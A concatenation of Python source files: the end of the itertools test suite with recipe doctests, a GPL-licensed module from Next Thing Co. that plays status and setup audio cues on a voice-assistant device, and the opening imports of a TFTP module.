[(0,1,2), (0,2,1), (1,0,2), (1,2,0), (2,0,1), (2,1,0)])
def test_product(self):
self.assertEqual(list(product('ABCD', 'xy')),
list(map(tuple, 'Ax Ay Bx By Cx Cy Dx Dy'.split())))
self.assertEqual(list(product(range(2), repeat=3)),
[(0,0,0), (0,0,1), (0,1,0), (0,1,1),
(1,0,0), (1,0,1), (1,1,0), (1,1,1)])
def test_repeat(self):
self.assertEqual(list(repeat(10, 3)), [10, 10, 10])
def test_starmap(self):
self.assertEqual(list(starmap(pow, [(2,5), (3,2), (10,3)])),
[32, 9, 1000])
def test_takewhile(self):
self.assertEqual(list(takewhile(lambda x: x<5, [1,4,6,4,1])), [1,4])
class TestPurePythonRoughEquivalents(unittest.TestCase):
@staticmethod
def islice(iterable, *args):
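# Rough pure-Python equivalent of itertools.islice: generate the wanted
# indices with range(start, stop, step), walk the input with enumerate and
# yield the matching elements, then keep consuming up to *stop* so the number
# of items taken from *iterable* matches the C implementation (see the
# consumption checks in test_islice_recipe below).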
s = slice(*args)
start, stop, step = s.start or 0, s.stop or sys.maxsize, s.step or 1
it = iter(range(start, stop, step))
try:
nexti = next(it)
except StopIteration:
# Consume *iterable* up to the *start* position.
for i, element in zip(range(start), iterable):
pass
return
try:
for i, element in enumerate(iterable):
if i == nexti:
yield element
nexti = next(it)
except StopIteration:
# Consume to *stop*.
for i, element in zip(range(i + 1, stop), iterable):
pass
def test_islice_recipe(self):
self.assertEqual(list(self.islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(self.islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(self.islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(self.islice('ABCDEFG', 0, None, 2)), list('ACEG'))
# Test items consumed.
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test that slice finishes in predictable state.
c = count()
self.assertEqual(list(self.islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
class TestGC(unittest.TestCase):
def makecycle(self, iterator, container):
container.append(iterator)
next(iterator)
del container, iterator
def test_accumulate(self):
a = []
self.makecycle(accumulate([1,2,a,3]), a)
def test_chain(self):
a = []
self.makecycle(chain(a), a)
def test_chain_from_iterable(self):
a = []
self.makecycle(chain.from_iterable([a]), a)
def test_combinations(self):
a = []
self.makecycle(combinations([1,2,a,3], 3), a)
def test_combinations_with_replacement(self):
a = []
self.makecycle(combinations_with_replacement([1,2,a,3], 3), a)
def test_compress(self):
a = []
self.makecycle(compress('ABCDEF', [1,0,1,0,1,0]), a)
def test_count(self):
a = []
Int = type('Int', (int,), dict(x=a))
self.makecycle(count(Int(0), Int(1)), a)
def test_cycle(self):
a = []
self.makecycle(cycle([a]*2), a)
def test_dropwhile(self):
a = []
self.makecycle(dropwhile(bool, [0, a, a]), a)
def test_groupby(self):
a = []
self.makecycle(groupby([a]*2, lambda x:x), a)
def test_issue2246(self):
# Issue 2246 -- the _grouper iterator was not included in GC
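# Each group iterator is stashed on the key function, which the groupby object
# itself references, creating a reference cycle through the internal _grouper
# objects that the cyclic GC must be able to track and collect.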
n = 10
keyfunc = lambda x: x
for i, j in groupby(range(n), key=keyfunc):
keyfunc.__dict__.setdefault('x',[]).append(j)
def test_filter(self):
a = []
self.makecycle(filter(lambda x:True, [a]*2), a)
def test_filterfalse(self):
a = []
self.makecycle(filterfalse(lambda x:False, a), a)
def test_zip(self):
a = []
self.makecycle(zip([a]*2, [a]*3), a)
def test_zip_longest(self):
a = []
self.makecycle(zip_longest([a]*2, [a]*3), a)
b = [a, None]
self.makecycle(zip_longest([a]*2, [a]*3, fillvalue=b), a)
def test_map(self):
a = []
self.makecycle(map(lambda x:x, [a]*2), a)
def test_islice(self):
a = []
self.makecycle(islice([a]*2, None), a)
def test_pairwise(self):
a = []
self.makecycle(pairwise([a]*5), a)
def test_permutations(self):
a = []
self.makecycle(permutations([1,2,a,3], 3), a)
def test_product(self):
a = []
self.makecycle(product([1,2,a,3], repeat=3), a)
def test_repeat(self):
a = []
self.makecycle(repeat(a), a)
def test_starmap(self):
a = []
self.makecycle(starmap(lambda *t: t, [(a,a)]*2), a)
def test_takewhile(self):
a = []
self.makecycle(takewhile(bool, [1, 0, a, a]), a)
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_accumulate(self):
s = [1,2,3,4,5]
r = [1,3,6,10,15]
n = len(s)
for g in (G, I, Ig, L, R):
self.assertEqual(list(accumulate(g(s))), r)
self.assertEqual(list(accumulate(S(s))), [])
self.assertRaises(TypeError, accumulate, X(s))
self.assertRaises(TypeError, accumulate, N(s))
self.assertRaises(ZeroDivisionError, list, accumulate(E(s)))
def test_chain(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(chain(g(s))), list(g(s)))
self.assertEqual(list(chain(g(s), g(s))), list(g(s))+list(g(s)))
self.assertRaises(TypeError, list, chain(X(s)))
self.assertRaises(TypeError, list, chain(N(s)))
self.assertRaises(ZeroDivisionError, list, chain(E(s)))
def test_compress(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
n = len(s)
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(compress(g(s), repeat(1))), list(g(s)))
self.assertRaises(TypeError, compress, X(s), repeat(1))
self.assertRaises(TypeError, compress, N(s), repeat(1))
self.assertRaises(ZeroDivisionError, list, compress(E(s), repeat(1)))
def test_product(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
self.assertRaises(TypeError, product, X(s))
self.assertRaises(TypeError, product, N(s))
self.assertRaises(ZeroDivisionError, product, E(s))
def test_cycle(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgtlen = len(s) * 3
expected = list(g(s))*3
actual = list(islice(cycle(g(s)), tgtlen))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, cycle, X(s))
self.assertRaises(TypeError, cycle, N(s))
self.assertRaises(ZeroDivisionError, list, cycle(E(s)))
def test_groupby(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual([k for k, sb in groupby(g(s))], list(g(s)))
self.assertRaises(TypeError, groupby, X(s))
self.assertRaises(TypeError, groupby, N(s))
self.assertRaises(ZeroDivisionError, list, groupby(E(s)))
def test_filter(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filter(isEven, g(s))),
[x for x in g(s) if isEven(x)])
self.assertRaises(TypeError, filter, isEven, X(s))
self.assertRaises(TypeError, filter, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filter(isEven, E(s)))
def test_filterfalse(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filterfalse(isEven, g(s))),
[x for x in g(s) if isOdd(x)])
self.assertRaises(TypeError, filterfalse, isEven, X(s))
self.assertRaises(TypeError, filterfalse, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filterfalse(isEven, E(s)))
def test_zip(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip(g(s))), lzip(g(s)))
self.assertEqual(list(zip(g(s), g(s))), lzip(g(s), g(s)))
self.assertRaises(TypeError, zip, X(s))
self.assertRaises(TypeError, zip, N(s))
self.assertRaises(ZeroDivisionError, list, zip(E(s)))
def test_ziplongest(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip_longest(g(s))), list(zip(g(s))))
self.assertEqual(list(zip_longest(g(s), g(s))), list(zip(g(s), g(s))))
self.assertRaises(TypeError, zip_longest, X(s))
self.assertRaises(TypeError, zip_longest, N(s))
self.assertRaises(ZeroDivisionError, list, zip_longest(E(s)))
def test_map(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(map(onearg, g(s))),
[onearg(x) for x in g(s)])
self.assertEqual(list(map(operator.pow, g(s), g(s))),
[x**x for x in g(s)])
self.assertRaises(TypeError, map, onearg, X(s))
self.assertRaises(TypeError, map, onearg, N(s))
self.assertRaises(ZeroDivisionError, list, map(onearg, E(s)))
def test_islice(self):
for s in ("12345", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(islice(g(s),1,None,2)), list(g(s))[1::2])
self.assertRaises(TypeError, islice, X(s), 10)
self.assertRaises(TypeError, islice, N(s), 10)
self.assertRaises(ZeroDivisionError, list, islice(E(s), 10))
def test_pairwise(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
seq = list(g(s))
expected = list(zip(seq, seq[1:]))
actual = list(pairwise(g(s)))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, pairwise, X(s))
self.assertRaises(TypeError, pairwise, N(s))
self.assertRaises(ZeroDivisionError, list, pairwise(E(s)))
def test_starmap(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
ss = lzip(s, s)
self.assertEqual(list(starmap(operator.pow, g(ss))),
[x**x for x in g(s)])
self.assertRaises(TypeError, starmap, operator.pow, X(ss))
self.assertRaises(TypeError, starmap, operator.pow, N(ss))
self.assertRaises(ZeroDivisionError, list, starmap(operator.pow, E(ss)))
def test_takewhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not isEven(elem): break
tgt.append(elem)
self.assertEqual(list(takewhile(isEven, g(s))), tgt)
self.assertRaises(TypeError, takewhile, isEven, X(s))
self.assertRaises(TypeError, takewhile, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, takewhile(isEven, E(s)))
def test_dropwhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not tgt and isOdd(elem): continue
tgt.append(elem)
self.assertEqual(list(dropwhile(isOdd, g(s))), tgt)
self.assertRaises(TypeError, dropwhile, isOdd, X(s))
self.assertRaises(TypeError, dropwhile, isOdd, N(s))
self.assertRaises(ZeroDivisionError, list, dropwhile(isOdd, E(s)))
def test_tee(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
it1, it2 = tee(g(s))
self.assertEqual(list(it1), list(g(s)))
self.assertEqual(list(it2), list(g(s)))
self.assertRaises(TypeError, tee, X(s))
self.assertRaises(TypeError, tee, N(s))
self.assertRaises(ZeroDivisionError, list, tee(E(s))[0])
class LengthTransparency(unittest.TestCase):
def test_repeat(self):
self.assertEqual(operator.length_hint(repeat(None, 50)), 50)
self.assertEqual(operator.length_hint(repeat(None, 0)), 0)
self.assertEqual(operator.length_hint(repeat(None), 12), 12)
def test_repeat_with_negative_times(self):
self.assertEqual(operator.length_hint(repeat(None, -1)), 0)
self.assertEqual(operator.length_hint(repeat(None, -2)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-1)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-2)), 0)
class RegressionTests(unittest.TestCase):
def test_sf_793826(self):
# Fix Armin Rigo's successful efforts to wreak havoc
def mutatingtuple(tuple1, f, tuple2):
# this builds a tuple t which is a copy of tuple1,
# then calls f(t), then mutates t to be equal to tuple2
# (needs len(tuple1) == len(tuple2)).
def g(value, first=[1]):
if first:
del first[:]
f(next(z))
return value
items = list(tuple2)
items[1:1] = list(tuple1)
gen = map(g, items)
z = zip(*[gen]*len(tuple1))
next(z)
def f(t):
global T
T = t
first[:] = list(T)
first = []
mutatingtuple((1,2,3), f, (4,5,6))
second = list(T)
self.assertEqual(first, second)
def test_sf_950057(self):
# Make sure that chain() and cycle() catch exceptions immediately
# rather than when shifting between input sources
def gen1():
hist.append(0)
yield 1
hist.append(1)
raise AssertionError
hist.append(2)
def gen2(x):
hist.append(3)
yield 2
hist.append(4)
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(False)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(True)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, cycle(gen1()))
self.assertEqual(hist, [0,1])
@support.skip_if_pgo_task
def test_long_chain_of_empty_iterables(self):
# Make sure itertools.chain doesn't run into recursion limits when
# dealing with long chains of empty iterables. Even with a high
# number this would probably only fail in Py_DEBUG mode.
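# chain.from_iterable is handed ten million empty iterables; advancing it must
# step over them iteratively, since a recursive implementation would exhaust
# the stack before StopIteration is raised.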
it = chain.from_iterable(() for unused in range(10000000))
with self.assertRaises(StopIteration):
next(it)
def test_issue30347_1(self):
def f(n):
if n == 5:
list(b)
return n != 6
for (k, b) in groupby(range(10), f):
list(b) # shouldn't crash
def test_issue30347_2(self):
class K:
def __init__(self, v):
pass
def __eq__(self, other):
nonlocal i
i += 1
if i == 1:
next(g, None)
return True
i = 0
g = next(groupby(range(10), K))[1]
for j in range(2):
next(g, None) # shouldn't crash
class SubclassWithKwargsTest(unittest.TestCase):
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_keywords_in_subclass(self):
# count is not subclassable...
for cls in (repeat, zip, filter, filterfalse, chain, map,
starmap, islice, takewhile, dropwhile, cycle, compress):
class Subclass(cls):
def __init__(self, newarg=None, *args):
cls.__init__(self, *args)
try:
Subclass(newarg=1)
except TypeError as err:
# we expect type errors because of wrong argument count
self.assertNotIn("keyword arguments", err.args[0])
@support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.ssize_t = struct.calcsize('n')
check_sizeof = support.check_sizeof
def test_product_sizeof(self):
basesize = support.calcobjsize('3Pi')
check = self.check_sizeof
check(product('ab', '12'), basesize + 2 * self.ssize_t)
check(product(*(('abc',) * 10)), basesize + 10 * self.ssize_t)
def test_combinations_sizeof(self):
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(combinations('abcd', 3), basesize + 3 * self.ssize_t)
check(combinations(range(10), 4), basesize + 4 * self.ssize_t)
def test_combinations_with_replacement_sizeof(self):
cwr = combinations_with_replacement
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(cwr('abcd', 3), basesize + 3 * self.ssize_t)
check(cwr(range(10), 4), basesize + 4 * self.ssize_t)
def test_permutations_sizeof(self):
basesize = support.calcobjsize('4Pni')
check = self.check_sizeof
check(permutations('abcd'),
basesize + 4 * self.ssize_t + 4 * self.ssize_t)
check(permutations('abcd', 3),
basesize + 4 * self.ssize_t + 3 * self.ssize_t)
check(permutations('abcde', 3),
basesize + 5 * self.ssize_t + 3 * self.ssize_t)
check(permutations(range(10), 4),
basesize + 10 * self.ssize_t + 4 * self.ssize_t)
libreftest = """ Doctest for examples in the library reference: libitertools.tex
>>> amounts = [120.15, 764.05, 823.14]
>>> for checknum, amount in zip(count(1200), amounts):
... print('Check %d is for $%.2f' % (checknum, amount))
...
Check 1200 is for $120.15
Check 1201 is for $764.05
Check 1202 is for $823.14
>>> import operator
>>> for cube in map(operator.pow, range(1,4), repeat(3)):
... print(cube)
...
1
8
27
>>> reportlines = ['EuroPython', 'Roster', '', 'alex', '', 'laura', '', 'martin', '', 'walter', '', 'samuele']
>>> for name in islice(reportlines, 3, None, 2):
... print(name.title())
...
Alex
Laura
Martin
Walter
Samuele
>>> from operator import itemgetter
>>> d = dict(a=1, b=2, c=1, d=2, e=1, f=2, g=3)
>>> di = sorted(sorted(d.items()), key=itemgetter(1))
>>> for k, g in groupby(di, itemgetter(1)):
... print(k, list(map(itemgetter(0), g)))
...
1 ['a', 'c', 'e']
2 ['b', 'd', 'f']
3 ['g']
# Find runs of consecutive numbers using groupby. The key to the solution
# is differencing with a range so that consecutive numbers all appear in
# the same group.
>>> data = [ 1, 4,5,6, 10, 15,16,17,18, 22, 25,26,27,28]
>>> for k, g in groupby(enumerate(data), lambda t:t[0]-t[1]):
... print(list(map(operator.itemgetter(1), g)))
...
[1]
[4, 5, 6]
[10]
[15, 16, 17, 18]
[22]
[25, 26, 27, 28]
>>> def take(n, iterable):
... "Return first n items of the iterable as a list"
... return list(islice(iterable, n))
>>> def prepend(value, iterator):
... "Prepend a single value in front of an iterator"
... # prepend(1, [2, 3, 4]) -> 1 2 3 4
... return chain([value], iterator)
>>> def enumerate(iterable, start=0):
... return zip(count(start), iterable)
>>> def tabulate(function, start=0):
... "Return function(0), function(1), ..."
... return map(function, count(start))
>>> import collections
>>> def consume(iterator, n=None):
... "Advance the iterator n-steps ahead. If n is None, consume entirely."
... # Use functions that consume iterators at C speed.
... if n is None:
... # feed the entire iterator into a zero-length deque
... collections.deque(iterator, maxlen=0)
... else:
... # advance to the empty slice starting at position n
... next(islice(iterator, n, n), None)
>>> def nth(iterable, n, default=None):
... "Returns the nth item or a default value"
... return next(islice(iterable, n, None), default)
>>> def all_equal(iterable):
... "Returns True if all the elements are equal to each other"
... g = groupby(iterable)
... return next(g, True) and not next(g, False)
>>> def quantify(iterable, pred=bool):
... "Count how many times the predicate is true"
... return sum(map(pred, iterable))
>>> def pad_none(iterable):
... "Returns the sequence elements and then returns None indefinitely"
... return chain(iterable, repeat(None))
>>> def ncycles(iterable, n):
... "Returns the sequence elements n times"
... return chain(*repeat(iterable, n))
>>> def dotproduct(vec1, vec2):
... return sum(map(operator.mul, vec1, vec2))
>>> def flatten(listOfLists):
... return list(chain.from_iterable(listOfLists))
>>> def repeatfunc(func, times=None, *args):
... "Repeat calls to func with specified arguments."
... " Example: repeatfunc(random.random)"
... if times is None:
... return starmap(func, repeat(args))
... else:
... return starmap(func, repeat(args, times))
>>> def grouper(n, iterable, fillvalue=None):
... "grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
... args = [iter(iterable)] * n
... return zip_longest(*args, fillvalue=fillvalue)
>>> def roundrobin(*iterables):
... "roundrobin('ABC', 'D', 'EF') --> A D E B F C"
... # Recipe credited to George Sakkis
... pending = len(iterables)
... nexts = cycle(iter(it).__next__ for it in iterables)
... while pending:
... try:
... for next in nexts:
... yield next()
... except StopIteration:
... pending -= 1
... nexts = cycle(islice(nexts, pending))
>>> def powerset(iterable):
... "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
... s = list(iterable)
... return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
>>> def unique_everseen(iterable, key=None):
... "List unique elements, preserving order. Remember all elements ever seen."
... # unique_everseen('AAAABBBCCDAABBB') --> A B C D
... # unique_everseen('ABBCcAD', str.lower) --> A B C D
... seen = set()
... seen_add = seen.add
... if key is None:
... for element in iterable:
... if element not in seen:
... seen_add(element)
... yield element
... else:
... for element in iterable:
... k = key(element)
... if k not in seen:
... seen_add(k)
... yield element
>>> def unique_justseen(iterable, key=None):
... "List unique elements, preserving order. Remember only the element just seen."
... # unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
... # unique_justseen('ABBCcAD', str.lower) --> A B C A D
... return map(next, map(itemgetter(1), groupby(iterable, key)))
>>> def first_true(iterable, default=False, pred=None):
... '''Returns the first true value in the iterable.
...
... If no true value is found, returns *default*
...
... If *pred* is not None, returns the first item
... for which pred(item) is true.
...
... '''
... # first_true([a,b,c], x) --> a or b or c or x
... # first_true([a,b], x, f) --> a if f(a) else b if f(b) else x
... return next(filter(pred, iterable), default)
>>> def nth_combination(iterable, r, index):
... 'Equivalent to list(combinations(iterable, r))[index]'
... pool = tuple(iterable)
... n = len(pool)
... if r < 0 or r > n:
... raise ValueError
... c = 1
... k = min(r, n-r)
... for i in range(1, k+1):
... c = c * (n - k + i) // i
... if index < 0:
... index += c
... if index < 0 or index >= c:
... raise IndexError
... result = []
... while r:
... c, n, r = c*r//n, n-1, r-1
... while index >= c:
... index -= c
... c, n = c*(n-r)//n, n-1
... result.append(pool[-1-n])
... return tuple(result)
This is not part of the examples but it tests to make sure the definitions
perform as purported.
>>> take(10, count())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> list(prepend(1, [2, 3, 4]))
[1, 2, 3, 4]
>>> list(enumerate('abc'))
[(0, 'a'), (1, 'b'), (2, 'c')]
>>> list(islice(tabulate(lambda x: 2*x), 4))
[0, 2, 4, 6]
>>> it = iter(range(10))
>>> consume(it, 3)
>>> next(it)
3
>>> consume(it)
>>> next(it, 'Done')
'Done'
>>> nth('abcde', 3)
'd'
>>> nth('abcde', 9) is None
True
>>> [all_equal(s) for s in ('', 'A', 'AAAA', 'AAAB', 'AAABA')]
[True, True, True, False, False]
>>> quantify(range(99), lambda x: x%2==0)
50
>>> a = [[1, 2, 3], [4, 5, 6]]
>>> flatten(a)
[1, 2, 3, 4, 5, 6]
>>> list(repeatfunc(pow, 5, 2, 3))
[8, 8, 8, 8, 8]
>>> import random
>>> take(5, map(int, repeatfunc(random.random)))
[0, 0, 0, 0, 0]
>>> list(islice(pad_none('abc'), 0, 6))
['a', 'b', 'c', None, None, None]
>>> list(ncycles('abc', 3))
['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c']
>>> dotproduct([1,2,3], [4,5,6])
32
>>> list(grouper(3, 'abcdefg', 'x'))
[('a', 'b', 'c'), ('d', 'e', 'f'), ('g', 'x', 'x')]
>>> list(roundrobin('abc', 'd', 'ef'))
['a', 'd', 'e', 'b', 'f', 'c']
>>> list(powerset([1,2,3]))
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
>>> all(len(list(powerset(range(n)))) == 2**n for n in range(18))
True
>>> list(powerset('abcde')) == sorted(sorted(set(powerset('abcde'))), key=len)
True
>>> list(unique_everseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D']
>>> list(unique_everseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'D']
>>> list(unique_justseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D', 'A', 'B']
>>> list(unique_justseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'A', 'D']
>>> first_true('ABC0DEF1', '9', str.isdigit)
'0'
>>> population = 'ABCDEFGH'
>>> for r in range(len(population) + 1):
... seq = list(combinations(population, r))
... for i in range(len(seq)):
... assert nth_combination(population, r, i) == seq[i]
... for i in range(-len(seq), 0):
... assert nth_combination(population, r, i) == seq[i]
"""
__test__ = {'libreftest' : libreftest}
def test_main(verbose=None):
test_classes = (TestBasicOps, TestVariousIteratorArgs, TestGC,
RegressionTests, LengthTransparency,
SubclassWithKwargsTest, TestExamples,
TestPurePythonRoughEquivalents,
SizeofTest)
support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in range(len(counts)):
support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print(counts)
support.run_doctest(sys.modules[__name__], verbose)
if __name__ == "__main__":
test_main(verbose=True)
|
statusAudioPlayer.py
|
# Copyright (C) 2017 Next Thing Co. <software@nextthing.co>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
import subprocess
import threading
import psutil
import time
ASSISTANT_LISTENING_AUDIO = "resources/chime.wav"
ASSISTANT_FAILURE_AUDIO = "resources/unsuccessful.wav"
INTRO_AUDIO = "resources/instructions.wav"
WAIT_AUDIO = "resources/wait.wav"
THINKING_AUDIO = "resources/thinking.wav"
READY_AUDIO = "resources/ready.wav"
INTERNET_DISCONNECTED = "resources/internet_disconnected.wav"
SETUP_AUDIO_PART1 = "resources/setup-1.wav" # Instructions before saying IP address
SETUP_AUDIO_PART2_1 = "resources/setup-2_1.wav" # For 192.168.81.1
SETUP_AUDIO_PART2_2 = "resources/setup-2_2.wav" # For 192.168.82.1
SETUP_AUDIO_PART3 = "resources/setup-3.wav" # Instructions after saying IP address
SETUP_AUDIO_PART4 = "resources/setup-4.wav" # Repeated instruction
class StatusAudioPlayer():
def __init__(self):
self.bPlayedIntro = False
self.bPlayedSetupInstructions = False
self.audioHighPriorityProcs = 0
self.bUserConnectedToWebFrontend = False
self.introTime = -100
self.audioTime = -100
# Set a status value for whether or not the user has successfully connected to the local web server's HTML frontend.
def setUserConnectionStatus(self,bStatus):
self.bUserConnectedToWebFrontend = bStatus
# Use aplay to play a WAV audio file, with an optional priority and delay.
# Can be set to block; otherwise aplay runs in its own thread.
def playAudio(self,audioFile,bBlocking=False,bPriority=False,delay=0):
# If this audio file is not high priority and one is already playing, do nothing.
if not bPriority and self.highPriorityAudioIsPlaying(): return
if delay > 0 and time.time() - self.audioTime < 0.5: return
def aplay():
self.audioTime = time.time()
if bPriority: self.audioHighPriorityProcs = self.audioHighPriorityProcs + 1
cmd = "sleep " + str(delay) + " && aplay --period-size=8192 --buffer-size=32768 --quiet " + audioFile
subprocess.call(cmd,shell=True)
if bPriority: self.audioHighPriorityProcs = self.audioHighPriorityProcs - 1
if not bBlocking:
t = threading.Thread(target=aplay, args = ())
t.setDaemon(True)
t.start()
else:
aplay()
return
def killAll(self):
for proc in psutil.process_iter():
if proc.name() == 'aplay':
proc.kill()
def highPriorityAudioIsPlaying(self):
if self.audioHighPriorityProcs > 0:
return True
else:
return False
def playIntro(self):
if not self.bPlayedIntro:
self.introTime = time.time()
self.bPlayedIntro = True
self.playAudio(INTRO_AUDIO,delay=1,bPriority=True)
time.sleep(1.5)
else:
self.playAudio(WAIT_AUDIO,delay=1.5,bPriority=False)
def playSetupInstructions(self):
if self.bPlayedSetupInstructions:
return
self.bPlayedSetupInstructions = True
# The USB ethernet gadget will use either 192.168.81.1 or 192.168.82.1, depending on the client's OS.
# Returns the setup audio file matching the address in use (part 2_1 for 192.168.81.1, part 2_2 for 192.168.82.1).
def getIPAudio():
status = None
while not status:
try:
status = subprocess.check_output(['ip','a','show','usb0'])
except:
pass
if status.find('NO-CARRIER') > -1:
return SETUP_AUDIO_PART2_2
return SETUP_AUDIO_PART2_1
def audioSequence():
time.sleep(0.5)
self.playAudio(SETUP_AUDIO_PART1, bBlocking=True,bPriority=True)
# Play specific files for a USB IP address for 192.168.81.1 and another for 192.168.82.1
self.playAudio(getIPAudio(), bBlocking=True,bPriority=True)
reminders = 0
# If user has not yet connected to the web server HTML frontend, play the IP address audio again.
while not self.bUserConnectedToWebFrontend:
if reminders == 0:
time.sleep(1)
self.audioMessagePriorityProc = self.playAudio(SETUP_AUDIO_PART3,bBlocking=True,bPriority=True)
else:
time.sleep(10)
self.audioMessagePriorityProc = self.playAudio(SETUP_AUDIO_PART4,bBlocking=True,bPriority=True)
self.audioMessagePriorityProc = self.playAudio(getIPAudio(), bBlocking=True,bPriority=True)
reminders = reminders+1
if reminders > 5:
return
t = threading.Thread(target=audioSequence, args = ())
t.setDaemon(True)
t.start()
def playThinking(self,delay=0):
self.playAudio(THINKING_AUDIO,delay=delay)
def playDisconnected(self):
time.sleep(0.25)
self.playAudio(INTERNET_DISCONNECTED)
self.playAudio(THINKING_AUDIO,delay=2)
def playWait(self):
time.sleep(0.25)
self.playAudio(WAIT_AUDIO)
def playReadyAudio(self):
time.sleep(0.25)
if self.introTime and time.time() - self.introTime < 30:
return
self.playAudio(READY_AUDIO)
def playListeningAudio(self):
self.playAudio(ASSISTANT_LISTENING_AUDIO)
def playFailureAudio(self):
self.playAudio(ASSISTANT_FAILURE_AUDIO)
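# --- Illustrative usage sketch (added; not part of the original module). The
# --- call order below is an assumption of how a boot/assistant script might drive it.
if __name__ == "__main__":
    player = StatusAudioPlayer()
    player.playIntro()                  # plays the intro instructions once
    player.playSetupInstructions()      # starts the setup/IP-address reminder thread
    # ... later, once the web frontend reports a connection:
    player.setUserConnectionStatus(True)
    player.playReadyAudio()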
|
tftp.py
|
import errno
import logging
import socket
from pathlib import Path, PurePosixPath
from threading import Thread
